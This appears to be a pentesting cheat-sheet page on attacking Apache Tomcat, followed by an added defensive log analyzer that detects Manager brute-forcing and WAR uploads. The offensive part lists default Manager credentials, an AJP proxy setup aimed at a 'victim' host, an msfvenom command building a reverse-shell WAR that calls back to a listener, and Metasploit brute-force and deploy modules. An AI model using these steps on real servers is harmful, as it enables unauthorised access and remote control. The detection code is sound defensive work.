akde/infosec

Information security is ultimately about managing risk


Overview

Tomcat usually listens on the following ports:

  • 8080 — HTTP
  • 8005 — Port for shutting down the Tomcat server; not interesting here
  • 8009 — Same functions as the HTTP port, but via the Apache JServ protocol AJP
    • AJP is basically HTTP in a compressed/binary form.

Checklist

  1. Check if /manager is accessible.
    • Default credentials are tomcat / s3cret or admin / admin

AJP

To communicate via the AJP port, Apache can be used to convert plain HTTP requests into AJP requests.

  1. Install an Apache2
  2. Install libapache2-mod-jk
  3. Restart Apache2
  4. Add a proxy to the victim (the ajp:// scheme in ProxyPass is served by mod_proxy_ajp, so mod_proxy and mod_proxy_ajp must be enabled; Order/Deny/Allow is Apache 2.2 syntax, on 2.4 it requires mod_access_compat)

    ProxyRequests Off
    <Proxy *>
        Order deny,allow
        Deny from all
        Allow from localhost
    </Proxy>
    ProxyPass / ajp://10.11.1.222:8009/
    ProxyPassReverse / ajp://10.11.1.222:8009/

Requests can now be made via localhost.

Exploit

Upload a WAR file with reverse shell code (Source):

msfvenom -p java/shell_reverse_tcp LHOST=192.168.109.129 LPORT=4444 -f war > shell3.war

Or do it with exploit/multi/http/tomcat_mgr_deploy.

Notes

  • Use scanner/http/tomcat_mgr_login to brute-force (Source)
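From the defender's side, both activities on this page (credential guessing against /manager and a WAR deployment through the Manager application) leave traces in Tomcat's access_log. The following is an added example, not code from the original page: a small analyzer that flags clients with repeated 401 responses on /manager and any request to the Manager deploy/upload endpoints. The log lines are constructed sample data in the default common log format; the IP addresses, user name and threshold are assumptions.

```python
import re
from collections import Counter

# Constructed sample Tomcat access_log lines (common log format); not real data.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - tomcat [01/Jan/2024:10:00:07 +0000] "GET /manager/html HTTP/1.1" 200 19112
10.0.0.5 - tomcat [01/Jan/2024:10:00:09 +0000] "POST /manager/html/upload HTTP/1.1" 302 0
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /docs/ HTTP/1.1" 200 1234
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Manager endpoints that create or replace a web application (WAR deployment).
DEPLOY_PATHS = ("/manager/text/deploy", "/manager/html/upload", "/manager/html/deploy")


def parse_line(line):
    """Return the fields of one access_log line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, threshold=5):
    """Flag clients with >= threshold failed /manager logins and every deploy request."""
    failures = Counter()
    deploys = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not rec["path"].startswith("/manager"):
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string before matching
        if rec["status"] == "401":
            failures[rec["ip"]] += 1
        if path.startswith(DEPLOY_PATHS) and rec["method"] in ("PUT", "POST", "GET"):
            deploys.append((rec["ip"], rec["user"], path))
    bruteforce = {ip: n for ip, n in failures.items() if n >= threshold}
    return {"bruteforce": bruteforce, "deploys": deploys}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

On the sample data the same client produces five 401s and then, once authenticated as tomcat, an upload through the Manager, which is exactly the sequence a successful default-credential login followed by a WAR deployment would leave behind.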
